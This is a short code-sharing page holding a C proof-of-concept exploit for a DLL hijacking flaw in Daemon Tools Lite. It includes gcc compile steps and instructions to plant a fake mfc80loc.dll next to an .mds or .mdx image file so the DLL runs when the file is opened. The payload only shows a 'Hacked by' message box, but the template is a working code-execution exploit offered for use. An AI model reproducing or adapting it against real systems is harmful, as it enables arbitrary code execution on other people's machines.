Your snipt has been migrated to #newsnipt successfully.
daemontoolsexploit.c
c
posted: Aug, 29th 2010 | jump to bottom
/* Daemon Tools Lite <= 4.35.6.0091 mfc80loc.dll DLL Hijacking Exploit Found by: Christian Heinrich (cmlh) Exploit by: Christian Heinrich (cmlh) Email: christianheinrich@live.com Web: http://www.twitter.com/cmlh Summary: Daemon Tools is a disk image mounting application for Microsoft Windows. Description: Daemon Tools suffers from a dll hijacking vulnerability that enables the attacker to execute arbitrary code on a local level through the .MDS and .MDX extensions. ---- Howto: gcc -shared -o mfc80loc.dll daemontoolsexploit.c Compile this file and rename to mfc80loc.dll Then create an empty file named anything.msd or anything.mdx or you can create a a legitimate image. Double clicking the .mds/.mdx file with the mfc80loc.dll file in the same folder will execute our code. ---- Tested on Microsoft Windows 7 / XP sp 3 Vulnerability discovered by Christian Heinrich (cmlh) christianheinrich@live.com 27.08.2010 */ #include <windows.h> BOOL WINAPI DllMain (HANDLE hinstDLL, DWORD fdwReason, LPVOID lpvReserved) { switch (fdwReason) { case DLL_PROCESS_ATTACH: dll_mll(); case DLL_THREAD_ATTACH: case DLL_THREAD_DETACH: case DLL_PROCESS_DETACH: break; } return TRUE; } int dll_mll() { MessageBox(0, "Hacked by cmlh !", "DLL Message", MB_OK); }
16 views
